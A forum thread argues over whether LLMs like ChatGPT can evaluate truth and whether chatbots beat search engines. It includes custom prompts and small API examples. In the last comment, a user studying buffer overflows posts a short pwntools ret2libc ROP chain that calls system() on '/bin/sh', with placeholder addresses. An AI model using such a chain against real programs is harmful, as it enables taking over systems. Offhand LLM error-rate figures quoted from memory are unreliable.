[–] Zozano@aussie.zone 15 points 2 days ago* (last edited 2 days ago) (2 children)

This is the reason I've deliberately customized GPT with the following prompts:

  • User expects correction if words or phrases are used incorrectly.

  • Tell it straight—no sugar-coating.

  • Stay skeptical and question things.

  • Keep a forward-thinking mindset.

  • User values deep, rational argumentation.

  • Ensure reasoning is solid and well-supported.

  • User expects brutal honesty.

  • Challenge weak or harmful ideas directly, no holds barred.

  • User prefers directness.

  • Point out flaws and errors immediately, without hesitation.

  • User appreciates when assumptions are challenged.

  • If something lacks support, dig deeper and challenge it.

I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.
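
If you drive the model through the API rather than the ChatGPT settings page, the same idea can be baked into a system message. Here's a minimal sketch, assuming the official OpenAI Python SDK and an OPENAI_API_KEY in the environment; the model name is illustrative, swap in whatever you actually use:

```python
# Minimal sketch: bake the directives above into a system message so every
# conversation starts from the same ground rules.
from openai import OpenAI

client = OpenAI()

SYSTEM_PROMPT = """\
Correct the user if words or phrases are used incorrectly.
Tell it straight; no sugar-coating. Stay skeptical and question things.
Point out flaws, errors, and unsupported assumptions immediately.
Prioritize deep, rational, well-supported argumentation.
"""

response = client.chat.completions.create(
    model="gpt-4o",  # illustrative; substitute your own model
    messages=[
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": "Critique this argument: ..."},
    ],
)
print(response.choices[0].message.content)
```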

[–] dzso@lemmy.world 7 points 1 day ago (1 children)

I'm not saying these prompts won't help, they probably will. But the notion that ChatGPT has any concept of "truth" is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.

[–] Zozano@aussie.zone 1 points 1 day ago* (last edited 1 day ago) (1 children)

What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. Tweak it a little, and GPT is more consistent and applies reasoning patterns that outperform the average human by miles.

Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure, it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.

So yes, it can evaluate truth. Not perfectly, but often better than the average person.

[–] dzso@lemmy.world 2 points 1 day ago (1 children)

I'm not saying humans are infallible at recognizing truth either. That's why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.

[–] Zozano@aussie.zone -1 points 1 day ago (1 children)

Right now, the capabilities of LLMs are the worst they'll ever be. It could literally be tomorrow that someone drops an LLM perfectly calibrated to evaluate truth claims. But right now, we're at least 90% of the way there.

The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.

You don't blame the tool, you blame the user. LLMs are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent and well-read, and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.

I'm curious as to what you regard as a better tool for evaluating truth?

Period.

[–] dzso@lemmy.world 1 points 1 day ago* (last edited 1 day ago) (1 children)

You don't understand what an LLM is, or how it works. They do not think, they are not intelligent, they do not evaluate truth. It doesn't matter how smart you think you are. In fact, thinking you're so smart that you can get an LLM to tell you the truth is downright dangerous naïveté.

[–] Zozano@aussie.zone 1 points 1 day ago* (last edited 1 day ago) (1 children)

I do understand what an LLM is. It's a probabilistic model trained on massive corpora to predict the most likely next token given a context window. I know it's not sentient and doesn't “think,” and doesn’t have beliefs. That’s not in dispute.
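
(For anyone unfamiliar, "predict the most likely next token" concretely means something like this toy sketch; the scores here are hard-coded, whereas a real model computes them from billions of learned weights:)

```python
# Toy next-token prediction: softmax over scores, then sample.
# Nothing here knows or checks whether the output is *true*;
# it only knows what is *likely* given the context.
import numpy as np

vocab = ["the", "cat", "sat", "mat", "truth"]
logits = np.array([2.1, 0.3, 1.7, 0.2, -1.0])  # raw scores (made up here)

probs = np.exp(logits - logits.max())          # softmax -> probability
probs /= probs.sum()                           # distribution over vocab

rng = np.random.default_rng(0)
next_token = rng.choice(vocab, p=probs)        # pick the next token
print(dict(zip(vocab, probs.round(3))), "->", next_token)
```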

But none of that disqualifies it from being useful in evaluating truth claims. Evaluating truth isn't about thinking in the human sense, it's about pattern-matching valid reasoning, sourcing relevant evidence, and identifying contradictions or unsupported claims. LLMs do that very well, especially when prompted properly.

Your insistence that this is “dangerous naïveté” confuses two very different things: trusting an LLM blindly, versus leveraging it with informed oversight. I’m not saying GPT magically knows truth, I’m saying it can be used as a tool in a truth-seeking process, just like search engines, logic textbooks, or scientific journals. None of those are conscious either, yet we use them to get closer to truth.

You're worried about misuse, and so am I. But claiming the tool is inherently useless because it lacks consciousness is like saying microscopes can't discover bacteria because they don’t know what they're looking at.

So again: if you believe GPT is inherently incapable of aiding in truth evaluation, the burden’s on you to propose a more effective tool that’s publicly accessible, scalable, and consistent. I’ll wait.

[–] dzso@lemmy.world 1 points 1 day ago (1 children)

What you're describing is not an LLM, it's tools that an LLM is programmed to use.

[–] Zozano@aussie.zone 0 points 1 day ago* (last edited 1 day ago) (1 children)

No, I’m specifically describing what an LLM is. It's a statistical model trained on token sequences to generate contextually appropriate outputs. That’s not “tools it uses”; that is the model. When I said it pattern-matches reasoning and identifies contradictions, I wasn’t talking about external plug-ins or retrieval tools, I meant the LLM's own internal learned representation of language, logic, and discourse.

You’re drawing a false distinction. When GPT flags contradictions, weighs claims, or mirrors structured reasoning, it's not outsourcing that to some other tool, it’s doing what it was trained to do. It doesn't need to understand truth like a human to model the structure of truthful argumentation, especially if the prompt constrains it toward epistemic rigor.

Now, if you’re talking about things like code execution, search, or retrieval-augmented generation, then sure, those are tools it can use. But none of that was part of my argument. The ability to track coherence, cite counterexamples, or spot logical fallacies is all within the base LLM. That’s just weights and training.

So unless your point is that LLMs aren't humans, which is obvious and irrelevant, all you've done is attack your own straw man.

[–] dzso@lemmy.world 0 points 1 day ago (1 children)

So you're describing a reasoning model, which is 1) still based on statistical token sequences and 2) trained on another tool (logic and discourse) that it uses to arrive at the truth. It's a very fallible process. I can't even begin to count the number of times that a reasoning model has given me a completely false conclusion. Research shows that even the most advanced LLMs are giving incorrect answers as much as 40% of the time IIRC. Which reminds me of a really common way that humans arrive at truth, which LLMs aren't capable of:

Fuck around and find out. Also known as the scientific method.

[–] Zozano@aussie.zone 1 points 1 day ago* (last edited 1 day ago)

You're not actually disagreeing with me, you’re just restating that the process is fallible. No argument there. All reasoning models are fallible, including humans. The difference is, LLMs are consistently fallible, in ways that can be measured, improved, and debugged (unlike humans, who are wildly inconsistent, emotionally reactive, and prone to motivated reasoning).

Also, the fact that LLMs are “trained on tools like logic and discourse” isn’t a weakness. That’s how any system, including humans, learns to reason. We don’t emerge from the womb with innate logic, we absorb it from language, culture, and experience. You’re applying a double standard: fallibility invalidates the LLM, but not the human brain? Come on.

And your appeal to “fuck around and find out” isn't a disqualifier; it’s an opportunity. LLMs already assist in experiment design, hypothesis testing, and even simulating edge cases. They don’t run the scientific method independently (yet), but they absolutely enhance it.

So again: no one's saying LLMs are perfect. The claim is they’re useful in evaluating truth claims, often more so than unaided human intuition. The fact that you’ve encountered hallucinations doesn’t negate that - it just proves the tool has limits, like every tool. The difference is, this one keeps getting better.

Edit: I’m not describing a “reasoning model” layered on top of an LLM. I’m describing what a large language model is and does at its core. Reasoning emerges from the statistical training on language patterns. It’s not a separate tool it uses, and it's not “trained on logic and discourse” as external modules. Logic and discourse are simply part of the training data; meaning they’re embedded into the weights through gradient descent, not bolted on as tools.

[–] Olap@lemmy.world 10 points 2 days ago (5 children)

I prefer reading. Wikipedia is great. DuckDuckGo still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cookbooks from before AI are plentiful. There are these things called newspapers, too; they aren't what they used to be, but you even get a choice of which one to buy.

I've no idea what a chatbot could help me with. And I think anybody who does need help with something could go learn about whatever they need in pretty short order if they wanted. And do a better job.

[–] vegetvs@kbin.earth 3 points 2 days ago (1 children)

I still use Ecosia.org for most of my research on the Internet. It doesn't need as many resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

[–] A_norny_mousse@feddit.org 3 points 2 days ago

People always forget about the energy it takes. 10 years ago we were shocked at the energy a Google data centre needed to run; now imagine that orders of magnitude larger, and for what?

[–] Deceptichum@quokk.au 2 points 2 days ago* (last edited 2 days ago) (1 children)

Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.

Search engines aren’t great with vague questions.

There’s this thing called using a wide variety of tools to one’s benefit; you should go learn about it.

[–] Olap@lemmy.world -1 points 2 days ago (1 children)

You search for topics and keywords on search engines. It's a different skill, and from what I see, it yields better results. If something is vague, think for a moment first and make it less vague. That goes for life!

And a tool which regurgitates rubbish in a verbose manner isn't a tool. It's a toy. Toys can spark your curiosity, but you don't rely on them. Toys look pretty, and can teach you things. The lesson is that they aren't a replacement for anything but lorem ipsum.

[–] Deceptichum@quokk.au 2 points 2 days ago* (last edited 2 days ago) (1 children)

Buddy, that's great if you know the topic or keyword to search for. If you don't, and only have a vague query you're trying to pin down into keywords or topics worth searching, you can use AI.

You can grandstand about tools vs. toys and whatever other Luddite shit you want; at the end of the day, despite all your raging, you're the only one who's going to miss out, whatever you fanatically tell yourself.

[–] Olap@lemmy.world 0 points 2 days ago (1 children)

I'm still sceptical, any chance you could share some prompts which illustrate this concept?

[–] Deceptichum@quokk.au 5 points 2 days ago* (last edited 2 days ago) (1 children)

Sure. An hour ago I watched a video about smaller scales and physics below the Planck length. I was curious: if we can classify smaller scales into conceptual groups, where each interacts with physics in its own way, what would the opposite end of the spectrum be? From there I was able to 'chat' with an AI, then search Wikipedia for terms such as cosmological horizon, brane cosmology, etc.

In the end there were only theories about higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped, product-driven AdSense shit we have today.

Remember how people used to say you can't use Wikipedia because it's unreliable? We would roll our eyes and say "yeah, but we scroll down to the references and use them to find source material". Same with LLMs: you sort through the output to find the information you need.

[–] Olap@lemmy.world 0 points 2 days ago (1 children)

Wikipedia isn't to be referenced in scientific papers, I'm sure we all agree there. But it does do almost exactly what you described. https://en.m.wikipedia.org/wiki/Shape_of_the_universe has some great further-reading links. https://en.m.wikipedia.org/wiki/Cosmology has some great reads too. And for those short on time: https://simple.m.wikipedia.org/wiki/Cosmology, which also has Related Pages.

I have yet to see how AI beats a search engine, and your example hasn't convinced me either.

[–] Deceptichum@quokk.au 5 points 2 days ago

If you still can't see how natural language search is useful, that's fine. We can, and we're happy to keep using it.

[–] Zozano@aussie.zone 2 points 2 days ago (1 children)

I often use it to check whether my rationale is correct, or if my opinions are valid.

[–] Olap@lemmy.world 0 points 2 days ago (1 children)

You do know it can't reason and literally makes shit up approximately 50% of the time? It'd be quicker to toss a coin!

[–] Zozano@aussie.zone 3 points 2 days ago* (last edited 2 days ago) (2 children)

Actually, given the aforementioned prompts, it's quite good at discerning flaws in my arguments and logical contradictions.

I've also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them to replies.

[–] LainTrain@lemmy.dbzer0.com 2 points 2 days ago* (last edited 2 days ago) (2 children)

Yeah this is my experience as well.

People you're replying to need to stop with the "gippity is bad" nonsense; it's actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of an endeavour ultimately created through taxpayer-funded research at public institutions, without shooting yourself in the foot by claiming what is very evidently not true.

In fact, if you haven't found a use for a gippity-type chatbot, it speaks a lot more about you and the fact that you probably don't do anything that complicated in your life where this would give you genuine value.

The article in the OP also demonstrates how it could be used by the deranged/unintelligent for bad ends as well, so maybe it's like a Dunning-Kruger curve.

[–] Satellaview@lemmy.zip 2 points 1 day ago (1 children)

…you probably don’t do anything that complicated in your life where this would give you genuine value.

God that’s arrogant.

[–] LainTrain@lemmy.dbzer0.com 1 points 1 day ago

I know, and that's fair. But am I wrong? That's what matters more than anything else.

I make a lot of bold statements on this account, but I never do so lightly or unthinkingly.

[–] Zozano@aussie.zone 2 points 2 days ago

Granted, it is flakey unless you've configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

[–] Olap@lemmy.world 1 points 2 days ago (1 children)

Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too.

[–] Zozano@aussie.zone 1 points 2 days ago

I'm good enough at noticing my own flaws not to be arrogant enough to believe I'm immune to making mistakes :p

[–] LainTrain@lemmy.dbzer0.com 1 points 2 days ago (1 children)

YouTube tutorials are for the most part garbage and a waste of your time; they're created for engagement and milking your money only. The edutainment side of YT à la Vsauce (pls come back) works as general trivia to ensure a well-rounded worldview, but it's not gonna make you an expert on any subject. You're on the right track with reading, but let's be real, you're not gonna have much luck learning anything of value in the brainrot that is newspapers and such, beyond cooking or w/e, and who cares about that; I'd rather they teach me how I can never have to eat again, because boy, that shit takes up so much time.

[–] Olap@lemmy.world 0 points 2 days ago

For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don't let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don't be tribal.

Don't use AI. Do your own thinking.

[–] A_norny_mousse@feddit.org 1 points 2 days ago* (last edited 1 day ago) (1 children)

💯

I have yet to see people using chatbots for anything actually useful in everyday life. You can search anything with a "normal" search engine, phrase your searches as questions (or "prompts"), and get better answers that aren't smarmy.

Also think of the orders of magnitude more energy AI sucks down compared to web search.

[–] LainTrain@lemmy.dbzer0.com 5 points 2 days ago* (last edited 2 days ago)

Okay, challenge accepted.

I use it to troubleshoot my own code when I'm dealing with something obscure and I'm at my wits' end. There's a good chance it will also spit out complete nonsense, like calling functions with parameters that don't exist, but it can also sometimes make halfway decent suggestions that you just won't find on a modern search engine in any reasonable amount of time, or that I would never have guessed to even look for due to assumptions made in the docs of a library or some such.

It's also helpful for explaining complex concepts by creating the examples you want. For instance, I was studying basic buffer overflows and wanted to see how the stack should look in GDB's examine-memory view for a correct ROP chain to accomplish what I was trying to do, something no tutorial ever bothered to show. Gippity generated it correctly, same as I had it at the time, and even suggested something that in the end made it actually work (putting a ret gadget directly after the overflow to get rid of any garbage in the stack frame).
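
For flavor, here's roughly the kind of payload layout it helped me reason about; a hypothetical pwntools sketch with made-up offsets and addresses (in practice you'd recover them with a cyclic pattern in GDB and a gadget finder), not the actual exercise:

```python
# Hypothetical ret2libc-style chain illustrating the trick: a lone `ret`
# gadget placed right after the overflow steps the stack pointer past any
# leftover junk (and keeps 16-byte alignment) before the real chain runs.
# All offsets/addresses below are made up for illustration.
from pwn import p64

OFFSET  = 72                  # padding up to the saved return address
RET     = 0x0000000000401016  # address of a lone `ret` instruction
POP_RDI = 0x0000000000401263  # `pop rdi; ret`
BINSH   = 0x0000000000404050  # address of a "/bin/sh" string
SYSTEM  = 0x0000000000401050  # address of system()

payload  = b"A" * OFFSET
payload += p64(RET)           # the extra ret gadget described above
payload += p64(POP_RDI)
payload += p64(BINSH)
payload += p64(SYSTEM)
```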

It was also much, much faster than watching some greedy time-vampire fuck spout off on YouTube in between SponsorBlock skipping his reminders to subscribe and whatnot.

Maybe not an everyday thing, but it's basically an everyday thing for me, so I tend to use it every day. Being a l33t haxx0r IT analyst schmuck often means I have to be both a generalist and a specialist in every tiny little thing across IT, and while studying there's nothing better than a machine that can quickly decompress knowledge from its dataset in the shape best suited to my brain, rather than having to filter so much useless info and outright misinformation from random Medium articles and Stack Overflow posts. Gippity could be wrong too, of course, but it's just way less to parse, and the odds are definitely in its favour.